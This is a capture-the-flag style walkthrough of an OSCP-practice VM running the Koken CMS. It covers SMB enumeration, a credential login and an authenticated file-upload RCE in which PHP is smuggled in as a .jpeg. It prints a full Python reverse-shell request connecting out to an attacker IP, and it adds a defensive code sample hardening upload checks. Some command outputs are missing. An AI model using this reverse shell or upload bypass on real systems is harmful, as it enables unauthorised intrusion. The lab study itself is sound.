This machine was developed to prepare for OSCP. It is boot2root, tested on VirtualBox (but works on VMWare) and has two flags: user.txt and proof.txt.
The file is not zipped, strangely, so it’s a 2.6Gb download as an .ova file.
We’ve got four ports: SMB (139/445), HTTP on 80 and port 8000. If you guessed that’s a second HTTP port, you’re correct.
smbclient let me enumerate the shares, but didn’t seem to want to connect to the one we wanted:
But it’s okay, because impacket can help:
From these files, we get something immediately useful:
The page on port 8000 seems to be the most interesting one, and it’s running a CMS called Koken, which is seemingly designed for photographic content. Running searchsploit shows an Authenticated RCE for a version of it, so that may be what we’re after.
gives us a page called /admin that allows login; it wants an email address and a password. We try it with firstname.lastname@example.org:babygirl and we’re in.
Checking the searchsploit entry, we find that after logging in we can upload PHP code in a file with a .jpeg extension and then change the file extension in Burp Suite Repeater. So my request looks like this (sorry for the wall of text):
Then we go find that file and send it commands like this:
GET //storage//originals//93//9c//cmd.php?cmd=python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("192.168.1.77",1234))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b' HTTP/1.1
Which gets us a shell.
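As an added defensive example, not code from the original post or from Koken: a Python model of the upload handling this step abuses. The extension-only filter that a renamed filename bypasses sits beside a hardened version that derives the stored extension from the file's magic bytes and rejects PHP tags anywhere in the body; the sample upload bytes and the assumption that the extension check runs before the request is modified are constructed for the example.

```python
import re
from typing import Optional

# Constructed sample uploads (not taken from the original post): a minimal JPEG
# header, and a harmless PHP stub standing in for the uploaded cmd.php.
JPEG_MAGIC = b"\xff\xd8\xff"
SAMPLE_JPEG = JPEG_MAGIC + b"\xe0\x00\x10JFIF\x00" + b"\x00" * 32
SAMPLE_PHP = b"<?php echo 'constructed stub'; ?>"

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
# Extension chosen by the server from the file's leading bytes.
MAGIC_TO_EXT = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

def weak_check(filename: str) -> bool:
    """Extension-only filter, applied before the request reaches the server
    (assumed to be the check the rename-in-Repeater step bypasses). It never
    looks at the bytes, so cmd.jpg containing PHP passes, and the server
    later stores whatever name the modified request carries."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED_EXT

def detect_ext(data: bytes) -> Optional[str]:
    """Pick the extension from magic bytes, not from the client's filename."""
    for magic, ext in MAGIC_TO_EXT.items():
        if data.startswith(magic):
            return ext
    return None

def hardened_store_name(filename: str, data: bytes) -> Optional[str]:
    """Server-side: return the name to store under, or None to reject.
    The extension comes from detect_ext(), so a request renamed to .php
    is still stored as .jpg; any PHP open tag in the body (a polyglot
    image with PHP appended) is rejected outright."""
    ext = detect_ext(data)
    if ext is None or b"<?php" in data or b"<?=" in data:
        return None
    stem = re.sub(r"[^A-Za-z0-9_-]", "_", filename.rsplit(".", 1)[0])[:64]
    return f"{stem or 'upload'}.{ext}"
```

The stem is sanitised as well, so a client-supplied path such as `../x.png` cannot steer the file out of the storage directory.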
We’re on the box as www-data, but we can read the user flag from /home/daisa:
Well, we can get the database credentials from here: